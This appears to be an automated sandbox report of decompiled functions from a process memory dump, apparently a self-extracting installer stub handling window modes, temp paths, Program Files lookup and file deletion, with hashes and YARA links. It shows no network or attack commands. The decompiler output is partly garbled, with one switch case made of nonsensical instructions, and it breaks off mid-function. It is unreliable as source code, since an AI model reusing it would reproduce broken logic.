Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: b6ad1cecba381ac7168002b24d07bd1371cb0371d796efd218e08b245087e3a5
Instruction ID: f3477955e6725bbe1d257c408e1dc6c33b65f0d70ac5b833cf5494bed22f0916
Opcode Fuzzy Hash: b6ad1cecba381ac7168002b24d07bd1371cb0371d796efd218e08b245087e3a5
Instruction Fuzzy Hash: 79310A7A90020AEBCB10DFE4C8859EFFBBCFF58700B04455AE955E3610E730AA85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 001791B0, Relevance: 9.1, APIs: 6, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E001791B0(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t17;
				signed int _t23;
				void* _t26;
				signed int _t32;
				signed int* _t36;

				_t36 = _a12;
				if(_t36 != 0) {
					_t34 = _a8;
					_t26 = 0x10;
					if(E0017FDFA(_a8, 0x1953ac, _t26) == 0) {
						L13:
						_t32 = _a4;
						 *_t36 = _t32;
						L14:
						 *0x193260(_t32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 4))))();
						_t17 = 0;
						L16:
						return _t17;
					}
					if(E0017FDFA(_t34, 0x1953ec, _t26) != 0) {
						if(E0017FDFA(_t34, 0x1953cc, _t26) != 0) {
							if(E0017FDFA(_t34, 0x19539c, _t26) != 0) {
								if(E0017FDFA(_t34, 0x19543c, _t26) != 0) {
									if(E0017FDFA(_t34, 0x19538c, _t26) != 0) {
										 *_t36 =  *_t36 & 0x00000000;
										_t17 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t32 = _a4;
								_t23 = _t32 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t36 =  ~_t32 & _t23;
								goto L14;
							}
							_t32 = _a4;
							_t23 = _t32 + 0xc;
							goto L11;
						}
						_t32 = _a4;
						_t23 = _t32 + 8;
						goto L11;
					}
					_t32 = _a4;
					_t23 = _t32 + 4;
					goto L11;
				}
				return 0x80004003;
			}

0x001791b4
0x001791b9
0x001791c7
0x001791cc
0x001791de
0x0017926d
0x0017926d
0x00179270
0x00179272
0x0017927a
0x00179280
0x00179282
0x0017928e
0x00000000
0x0017928f
0x001791f5
0x00179210
0x0017922b
0x00179246
0x0017926b
0x00179286
0x00179289
0x00000000
0x00179289
0x00000000
0x0017926b
0x00179248
0x0017924b
0x0017924e
0x00179252
0x00179256
0x00000000
0x00179256
0x0017922d
0x00179230
0x00000000
0x00179230
0x00179212
0x00179215
0x00000000
0x00179215
0x001791f7
0x001791fa
0x00000000
0x001791fa
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 001791D4
_memcmp.LIBVCRUNTIME ref: 001791EB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: dc1a7401c7ec29c9dd4d30f6d63087ff1523c96a5f065760ccdfa6a7e83b6d34
Instruction ID: c6428b82b3e72eb459d81a633ad5d5263883dac0cff44bc78e50b58107ac69c9
Opcode Fuzzy Hash: dc1a7401c7ec29c9dd4d30f6d63087ff1523c96a5f065760ccdfa6a7e83b6d34
Instruction Fuzzy Hash: E521A47164010EBBDB19AE10CC81E3B77BDEB50794B10C129FC0DAB202E370ED4A9791

Uniqueness

Uniqueness Score: -1.00%

Function 00188FA5, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00188FA5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x19e6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E001885A9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E0018A671(_t25, _t36, __eflags,  *0x19e6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00188E16(_t25, _t31, 0x1c1290);
							E001884DE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E001884DE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00188566(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x19e6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E001885A9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E0018A671(_t27, _t37, __eflags,  *0x19e6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00188E16(_t27, _t32, 0x1c1290);
									E001884DE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E001884DE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0018A61B(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0018A61B(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00188fa5
0x00188fa5
0x00188fa5
0x00188faf
0x00188fb1
0x00188fb6
0x00188fb9
0x00188fc7
0x00188fce
0x00188fd3
0x00188fd6
0x00188fd9
0x00188feb
0x00188ff0
0x00188ff2
0x00188ffd
0x00189004
0x00189009
0x0018900c
0x0018900e
0x00000000
0x00000000
0x00000000
0x00000000
0x00188ff4
0x00188ff4
0x00000000
0x00188ff4
0x00188fdb
0x00188fdb
0x00188fdc
0x00188fdc
0x00188fe1
0x0018901c
0x0018901d
0x00189023
0x00189028
0x0018902b
0x0018902c
0x0018902d
0x00189034
0x00189036
0x00189038
0x0018903d
0x00189040
0x0018904e
0x0018905a
0x0018905d
0x00189060
0x00189072
0x00189077
0x00189079
0x00189084
0x0018908a
0x00189092
0x00189094
0x00000000
0x00000000
0x00000000
0x00000000
0x0018907b
0x0018907b
0x00000000
0x0018907b
0x00189062
0x00189062
0x00189063
0x00189063
0x00189096
0x00189097
0x00189097
0x00189042
0x00189048
0x0018904c
0x0018909f
0x001890a0
0x001890a6
0x00000000
0x00000000
0x00000000
0x0018904c
0x001890ad
0x001890ad
0x00188fbb
0x00188fc1
0x00188fc5
0x00189010
0x00189011
0x0018901b
0x00000000
0x00000000
0x00000000
0x00188fc5

APIs

GetLastError.KERNEL32(?,001A0EE8,00183E14,001A0EE8,?,?,00183713,00000050,?,001A0EE8,00000200), ref: 00188FA9
_free.LIBCMT ref: 00188FDC
_free.LIBCMT ref: 00189004
SetLastError.KERNEL32(00000000,?,001A0EE8,00000200), ref: 00189011
SetLastError.KERNEL32(00000000,?,001A0EE8,00000200), ref: 0018901D
_abort.LIBCMT ref: 00189023

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 94c4f1a9457e7ac76a0171110eef4ef381afd72ad50a77a48bc4c7a399bbd452
Instruction ID: 5614f4a0b4e94e5a50a27fb0511f89af744d566a32b5d3cb5b8d53f0c2072e72
Opcode Fuzzy Hash: 94c4f1a9457e7ac76a0171110eef4ef381afd72ad50a77a48bc4c7a399bbd452
Instruction Fuzzy Hash: EEF02836504E006BC21277246C0AF3B2A6E9FE1760F79011AF525D2592EF20CF019F15

Uniqueness

Uniqueness Score: -1.00%

Function 0017D2E6, Relevance: 9.0, APIs: 6, Instructions: 43
windowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017D2E6(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}

0x0017d2f2
0x0017d2ff
0x0017d304
0x0017d314
0x0017d31d
0x0017d327
0x0017d331
0x0017d331
0x0017d33c
0x0017d342
0x00000000
0x0017d346
0x0017d34b

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0017D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017D31D
TranslateMessage.USER32(?), ref: 0017D327
DispatchMessageW.USER32(?), ref: 0017D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0017D33C

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: a34c1c5e48e47fff71750d2983200d9384cefb0d18a14c1a8e1b9e6d9fe8516d
Instruction ID: 6c824010fc8c944099348fcde4e33b440c7ce49466664266b8f396173853c989
Opcode Fuzzy Hash: a34c1c5e48e47fff71750d2983200d9384cefb0d18a14c1a8e1b9e6d9fe8516d
Instruction Fuzzy Hash: 2DF01972A0121DABCA205BA1EC4CEDBBF7DEF52391F048012F64AD2410D634D591C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0017C40E, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0017C40E(void* __ecx, void* __edx, void* __esi) {
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t275;
				void* _t288;
				signed int _t291;
				void* _t294;
				void* _t295;
				signed int _t296;
				void* _t300;

				L0:
				while(1) {
					L0:
					_t294 = __esi;
					_t288 = __edx;
					 *0x1bec98 = 1;
					_t275 = _t300 - 0x3508;
					if( *((short*)(_t300 - 0x3508)) != 0x3c) {
						goto L96;
					}
					L86:
					__eax = __ebp - 0x3506;
					_push(__ebp - 0x3506);
					__eax = E001815E8(__ecx);
					_pop(__ecx);
					__ecx = 0x3e;
					if(__eax == 0) {
						goto L96;
					}
					L87:
					_t101 = __eax + 2; // 0x2
					__ecx = _t101;
					 *(__ebp - 0x14) = _t101;
					__ecx = 0;
					 *__eax = __cx;
					__eax = __ebp - 0x108;
					_push(0x64);
					_push(__ebp - 0x108);
					__eax = __ebp - 0x3506;
					_push(__ebp - 0x3506);
					while(1) {
						L88:
						__ebx = E0017A6C7();
						if(__ebx == 0) {
							break;
						}
						L89:
						if( *(__ebp - 0x108) == 0) {
							break;
						}
						L90:
						__eax = __ebp - 0x108;
						__eax = E001717AC(__ebp - 0x108, L"HIDE");
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__edi = __edi & __eax;
						__eax = __ebp - 0x108;
						__eax = E001717AC(__ebp - 0x108, L"MAX");
						if(__eax == 0) {
							__edi = 3;
						}
						__eax = __ebp - 0x108;
						__eax = E001717AC(__ebp - 0x108, L"MIN");
						if(__eax == 0) {
							__edi = 6;
						}
						_push(0x64);
						__eax = __ebp - 0x108;
						_push(__ebp - 0x108);
						_push(__ebx);
					}
					L95:
					__ebx =  *(__ebp - 0x14);
					L96:
					if( *((intOrPtr*)(_t300 + 0x10)) != 5) {
						L99:
						if( *((intOrPtr*)(_t300 + 0x10)) == 4) {
							if(_t294 == 6) {
								E0017CE22(_t300,  *((intOrPtr*)(_t300 + 8)), _t275, 1, 0);
							}
						}
						while(1) {
							L172:
							_push(0x1000);
							_t208 = _t300 - 0x15; // 0xffffcae3
							_t209 = _t300 - 0xd; // 0xffffcaeb
							_t210 = _t300 - 0x3508; // 0xffff95f0
							_t211 = _t300 - 0xfd58; // 0xfffecda0
							_push( *((intOrPtr*)(_t300 + 0xc)));
							_t220 = E0017AA36();
							_t275 =  *((intOrPtr*)(_t300 + 0x10));
							 *((intOrPtr*)(_t300 + 0xc)) = _t220;
							if(_t220 != 0) {
								_t221 = _t300 - 0x3508;
								_t295 = _t300 - 0x1bd58;
								_t291 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E001717AC(_t300 - 0xfd58,  *((intOrPtr*)(0x19e618 + _t296 * 4))) != 0) {
								_t296 = _t296 + 1;
								if(_t296 < 0xe) {
									continue;
								} else {
									goto L172;
								}
							}
							if(_t296 > 0xd) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t296 * 4 +  &M0017CAA1))) {
								case 0:
									L9:
									__eflags = _t275 - 2;
									if(_t275 == 2) {
										E00179DA4(_t300 - 0x7d50, 0x800);
										E0016A49D(E0016B965(_t300 - 0x7d50, _t300 - 0x3508, _t300 - 0xdd58, 0x800), _t275, _t300 - 0x8d58, _t296);
										 *(_t300 - 4) = 0;
										E0016A5D7(_t300 - 0x8d58, _t300 - 0xdd58);
										E001670BF(_t300 - 0x5d50);
										while(1) {
											L23:
											_push(0);
											_t283 = _t300 - 0x8d58;
											_t235 = E0016A52A(_t300 - 0x8d58, _t288, _t300 - 0x5d50);
											__eflags = _t235;
											if(_t235 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t300 - 0x5d50, 0);
											__eflags =  *(_t300 - 0x4d44);
											if(__eflags == 0) {
												L16:
												_t239 = GetFileAttributesW(_t300 - 0x5d50);
												__eflags = _t239 - 0xffffffff;
												if(_t239 == 0xffffffff) {
													continue;
												}
												L17:
												_t241 = DeleteFileW(_t300 - 0x5d50);
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													_t298 = 0;
													_push(0);
													goto L20;
													L20:
													E0016400A(_t300 - 0x1108, 0x800, L"%s.%d.tmp", _t300 - 0x5d50);
													_t302 = _t302 + 0x14;
													_t246 = GetFileAttributesW(_t300 - 0x1108);
													__eflags = _t246 - 0xffffffff;
													if(_t246 != 0xffffffff) {
														_t298 = _t298 + 1;
														__eflags = _t298;
														_push(_t298);
														goto L20;
													} else {
														_t249 = MoveFileW(_t300 - 0x5d50, _t300 - 0x1108);
														__eflags = _t249;
														if(_t249 != 0) {
															MoveFileExW(_t300 - 0x1108, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E0016B4F7(_t283, __eflags, _t300 - 0x7d50, _t300 - 0x1108, 0x800);
											E0016B207(__eflags, _t300 - 0x1108, 0x800);
											_t299 = E001835B3(_t300 - 0x7d50);
											__eflags = _t299 - 4;
											if(_t299 < 4) {
												L14:
												_t260 = E0016B925(_t300 - 0x3508);
												__eflags = _t260;
												if(_t260 != 0) {
													break;
												}
												L15:
												_t263 = E001835B3(_t300 - 0x5d50);
												__eflags = 0;
												 *((short*)(_t300 + _t263 * 2 - 0x5d4e)) = 0;
												E0017F350(0x800, _t300 - 0x40, 0, 0x1e);
												_t302 = _t302 + 0x10;
												 *((intOrPtr*)(_t300 - 0x3c)) = 3;
												_push(0x14);
												_pop(_t266);
												 *((short*)(_t300 - 0x30)) = _t266;
												 *((intOrPtr*)(_t300 - 0x38)) = _t300 - 0x5d50;
												_push(_t300 - 0x40);
												 *0x1c2074();
												goto L16;
											}
											L13:
											_t271 = E001835B3(_t300 - 0x1108);
											__eflags = _t299 - _t271;
											if(_t299 > _t271) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
										E0016A4B3(_t300 - 0x8d58);
									}
									goto L172;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E001835B3(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0x1bdc84);
										__eax = E001835DE(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											__eax = E00187168(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L001835CE(__esi);
										}
									}
									goto L172;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
									}
									goto L172;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L172;
									}
									L42:
									__eflags =  *0x1aa472 - __di;
									if( *0x1aa472 != __di) {
										goto L172;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x3508;
									_push(0x22);
									 *(__ebp - 0x1108) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x3508) - __ax;
									if( *(__ebp - 0x3508) == __ax) {
										__edi = __ebp - 0x3506;
									}
									__eax = E001835B3(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L172;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1108 = E0016FE56(__ebp - 0x1108, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1108;
												__eax = E001817CB(__ebp - 0x1108, __ebp - 0x1108);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1108;
												__edi = 0x1aa472;
												E0016FE56(0x1aa472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
												__eax = E0017A8D0(__ebp - 0x1108, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0x1aa472); // executed
												__eax = __ebp - 0x1108;
												__eax = E001835E9(__ebp - 0x1108, 0x1aa472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
												}
												goto L172;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0x1c2028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1108;
													_push(__ebp - 0x1108);
													__eax = __ebp - 0x20;
													_push(__ebp - 0x20);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0x1c2024();
													_push( *(__ebp - 0x1c));
													 *0x1c2004() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *(__ebp + __eax * 2 - 0x1108) = __cx;
												}
												__eflags =  *(__ebp - 0x1108) - __bx;
												if( *(__ebp - 0x1108) != __bx) {
													__eax = __ebp - 0x1108;
													__eax = E001835B3(__ebp - 0x1108);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1108 = E0016FE2E(__eflags, __ebp - 0x1108, "\\", __esi);
													}
												}
												__esi = E001835B3(__edi);
												__eax = __ebp - 0x1108;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1108 = E0016FE2E(__eflags, __ebp - 0x1108, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L50;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L172;
										} else {
											__ebp - 0x1108 = E0016FE56(__ebp - 0x1108, __edi, 0x800);
											goto L63;
										}
									}
								case 4:
									L68:
									__eflags =  *0x1aa46c - 1;
									__eflags = __eax - 0x1aa46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *__edi & __cl;
									_pop(es);
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0x1a8453 = __cl;
										 *0x1a8460 = 1;
										goto L172;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0x1a8453 = __cl;
										L79:
										 *0x1a8460 = __cl;
										goto L172;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L172;
									}
									L77:
									 *0x1a8453 = 1;
									goto L79;
								case 6:
									goto L0;
								case 7:
									L105:
									__eflags = __ebx - 1;
									if(__eflags != 0) {
										L122:
										__eflags = __ebx - 7;
										if(__ebx == 7) {
											__eflags =  *0x1aa46c;
											if( *0x1aa46c == 0) {
												 *0x1aa46c = 2;
											}
											 *0x1a9468 = 1;
										}
										goto L172;
									}
									L106:
									__eax = __ebp - 0x7d50;
									__edi = 0x800;
									GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
									E0016B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
									__esi = 0;
									_push(0);
									while(1) {
										L108:
										_push( *0x19e5f8);
										__ebp - 0x7d50 = E0016400A(0x1a946a, __edi, L"%s%s%u", __ebp - 0x7d50);
										__eax = E0016A180(0x1a946a);
										__eflags = __al;
										if(__al == 0) {
											break;
										}
										L107:
										__esi =  &(__esi->i);
										__eflags = __esi;
										_push(__esi);
									}
									L109:
									__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x1a946a);
									__eflags =  *(__ebp - 0x3508);
									if( *(__ebp - 0x3508) == 0) {
										goto L172;
									}
									L110:
									__eflags =  *0x1b6b7a;
									if( *0x1b6b7a != 0) {
										goto L172;
									}
									L111:
									__eax = 0;
									 *(__ebp - 0x1508) = __ax;
									__eax = __ebp - 0x3508;
									_push(0x2c);
									_push(__ebp - 0x3508);
									__eax = E001815E8(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax != 0) {
										L118:
										__eflags =  *(__ebp - 0x1508);
										if( *(__ebp - 0x1508) == 0) {
											__ebp - 0x1bd58 = __ebp - 0x3508;
											E0016FE56(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
											__ebp - 0x1508 = E0016FE56(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
										}
										__ebp - 0x3508 = E0017A4F2(__ebp - 0x3508);
										__eax = 0;
										 *(__ebp - 0x2508) = __ax;
										__ebp - 0x1508 = __ebp - 0x3508;
										__eax = E00179F35( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
										__eflags = __eax - 6;
										if(__eax == 6) {
											goto L172;
										} else {
											L121:
											__eax = 0;
											__eflags = 0;
											 *0x1a8450 = 1;
											 *0x1a946a = __ax;
											__eax = EndDialog( *(__ebp + 8), 1);
											goto L122;
										}
									}
									L112:
									__edx = 0;
									__esi = 0;
									__eflags =  *(__ebp - 0x3508) - __dx;
									if( *(__ebp - 0x3508) == __dx) {
										goto L118;
									}
									L113:
									__ecx = 0;
									__eax = __ebp - 0x3508;
									while(1) {
										L114:
										__eflags =  *__eax - 0x40;
										if( *__eax == 0x40) {
											break;
										}
										L115:
										__esi =  &(__esi->i);
										__eax = __ebp - 0x3508;
										__ecx = __esi + __esi;
										__eax = __ebp - 0x3508 + __ecx;
										__eflags =  *__eax - __dx;
										if( *__eax != __dx) {
											continue;
										}
										L116:
										goto L118;
									}
									L117:
									__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
									__ebp - 0x1508 = E0016FE56(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
									__eax = 0;
									__eflags = 0;
									 *(__ebp + __esi * 2 - 0x3508) = __ax;
									goto L118;
								case 8:
									L126:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x3508) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x3508;
											_push(__ebp - 0x3508);
											__eax = E00187107(__ebx, __edi);
											_pop(__ecx);
											 *0x1bec94 = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0x1bec90 = E0017AB9A(__ecx, __edx, __eflags);
									}
									 *0x1b6b7b = 1;
									goto L172;
								case 9:
									L131:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L172;
									}
									L132:
									__eax = 0;
									 *(__ebp - 0x4d08) = __ax;
									__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
									__eax = E00186420( *(__ebp - 0x1bd58) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0x1bbb82);
										__eax = __ebp - 0x4d08;
										_push(__ebp - 0x4d08);
										__eax = E0016FE56();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x4d08;
										if(__eflags == 0) {
											_push(0x1bab82);
											_push(__eax);
											__eax = E0016FE56();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0x1bcb82);
											_push(__eax);
											__eax = E0016FE56();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9d58) = __ax;
									 *(__ebp - 0x3d08) = __ax;
									__ebp - 0x19d58 = __ebp - 0x6d50;
									__eax = E001857E6(__ebp - 0x6d50, __ebp - 0x19d58);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) != __bx) {
										L140:
										__ebp - 0x6d50 = E0016A180(__ebp - 0x6d50);
										__eflags = __al;
										if(__al != 0) {
											goto L157;
										}
										L141:
										__ebx = __edi;
										__esi = __ebp - 0x6d50;
										__eflags =  *(__ebp - 0x6d50) - __bx;
										if( *(__ebp - 0x6d50) == __bx) {
											goto L157;
										}
										L142:
										_push(0x20);
										_pop(__ecx);
										do {
											L143:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L145:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6d50 = E0016A180(__ebp - 0x6d50);
												__eflags = __al;
												if(__al == 0) {
													L152:
													__esi->i = __di;
													L153:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L154;
												}
												L146:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
